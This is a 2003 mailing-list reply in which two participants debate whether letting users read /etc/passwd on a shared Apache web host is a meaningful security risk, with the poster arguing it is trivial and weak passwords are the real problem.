Re: htaccess with apache

[Tim Greer <chatmaster () charter net>]

On Fri, 2003-11-07 at 06:12, António Vasconcelos wrote:
> Tim Greer wrote:
>
> > > the traditional buffer overflow in malloc() and 
> > > memcpy() or strcpy() shows just that.
> > >    
> >
> > How is this relevant to the permissions on passwd?
> >  
>
> Just to show how easy is to do something that looks to be inocent and 
> turns out to be a major security problem.

Pretty easy, assuming the person in question doesn't know about the
subject.  However, and alternatively, the same question applies when
people make a big deal about something that isn't when they don't fully
understand the implications of.

> > (unless your server isn't set up well), and save the resources since
> > your server is secured properly.  Oh well, to each their own, but I have
> > to wonder when people make a big deal about something that's not.
> >  
> I'm not talking about good/bad server setup.

If you're saying access to view the passwd file is a huge risk you are.

> It's just that the username/password authentication mecanism is a weak 
> one, and I know that, if possible, users will use a bad or easy to guess 
> password.

Then the problem exists anyway.  I said myself that it doesn't hurt, but
there's no way you can effectively run a web host with many users on it
and hide all this trivial information and still have a lot of services
(and security implementations) work well.  If the user has a weak
password, it's all over anyway for their account.  You can protect your
system, provided you know how, but you can not make people smarter and
trying to hide such trivial things is not going to do any good.  Those
are the people that shouldn't have shell access anyway, and being that,
the username in passwd will not need to be the same for their email or
FTP anyway, so what risk does the system's yellow page file pose?  Do
you see what I mean about "how you set up your system and how secure it
is"?

> My experience tells me that about 10% of the users _do_ choose a pasword 
> that can be retrived just from the username and GECOS fields, plus one 
> or two digits.

Okay, so someone can likely know this from their CGI/PHP script, error
codes/banners/messages, domain name, etc. anyway.  And, what I said
above still applies.

> So, disclosing the /etc/passwd file is something that should not be 
> done,

Yes it should.

>  and should not be regarded as trivial.

But, it is.

> As it _may_ contain info valuable for someone that wants to break into 
> your sistem.

Unlikely.  And only valuable to access the person's account--your system
has nothing to do with it if it's secure--either it is or not.  You plan
for user's to have their accounts accessed due to weak passwords or poor
methods of storing them, and so on.  If their script is insecure to
allow any file to be viewed that the CGI/PHP process allows, then an
attacker can easily find out what their username is ANYWAY!  Why do you
actually believe this is such a big deal?

> You should not regard anithing as trivial just because you don't know 
> how (or if) it can be used against you.

I agree, and since I do know, I can confidently say this is trivial.  
If you fail to understand the issues involved, that's not my fault. 
Conversely, the same logic applies to the other side of this debate--you
shouldn't regard things as a major risk, just because you don't
understand or know that they aren't.  End if discussion, if you want me
to provide an example on an account or via a vulnerable script, with the
passwd having accessed, I'll be happy to do it to prove my point to
you.  In the meantime, maybe buy some books or something and learn about
the topic you are so hotly debating.
-- 
Tim Greer <chatmaster () charter net>